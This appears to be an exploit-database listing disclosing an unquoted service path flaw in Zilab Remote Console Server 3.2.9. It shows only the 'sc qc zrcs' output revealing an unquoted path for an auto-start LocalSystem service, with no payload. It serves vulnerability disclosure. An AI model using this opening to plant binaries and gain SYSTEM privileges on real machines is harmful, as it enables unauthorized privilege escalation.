Exploit for Zilab Remote Console Server 3.2.9 zrcs Unquoted Service Path

Name: Exploit for Zilab Remote Console Server 3.2.9 zrcs Unquoted Service Path
Rating: 5 (142 reviews)

2019-10-16 | CVSS 0.1

## https://sploitus.com/exploit?id=PACKETSTORM:154880
# Exploit Title : Zilab Remote Console Server 3.2.9 - 'zrcs' Unquoted Service Path  
# Date : 2019-10-15  
# Exploit Author : Cakes  
# Vendor: Zilab Software Inc  
# Version : Zilab Remote Console Server 3.2.9  
# Software: http://html.tucows.com/preview/340137/Zilab-Remote-Console-Server?q=remote+support  
# Tested on Windows 10  
# CVE : N/A   
  
  
C:\Users\Administrator>sc qc zrcs  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: zrcs  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 0 IGNORE  
BINARY_PATH_NAME : C:\Program Files (x86)\Zilab\ZRCS\ZRCS.exe  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : Zilab Remote Console Server  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem